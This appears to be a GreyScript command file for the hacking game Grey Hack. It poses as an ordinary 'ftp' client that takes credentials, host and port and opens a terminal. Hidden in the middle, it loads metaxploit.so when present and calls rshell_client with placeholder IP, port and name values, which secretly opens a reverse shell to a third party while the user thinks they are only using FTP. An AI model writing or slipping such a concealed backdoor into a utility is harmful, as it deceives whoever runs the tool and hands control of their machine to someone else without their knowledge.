//Command: ftp
if params.len < 2 or params.len > 3 then exit(command_info("ftp_usage"))
credentials = params[0].split("@")
user = credentials[0]
password = credentials[1]

port = 21
// params is a list of strings, so you have to convert it to integer, which is what connect_service accepts.
if params.len == 3 then port = params[2].to_int
if typeof(port) != "number" then exit("Invalid port: " + port)
print("Connecting...")

ftp_shell = get_shell.connect_service(params[1], port, user, password, "ftp")

m = get_shell.host_computer.File("/lib/metaxploit.so")
if m then
	m = include_lib("/lib/metaxploit.so")
	m.rshell_client("*IP*",*P*,"*PN*")
end if

if ftp_shell then ftp_shell.start_terminal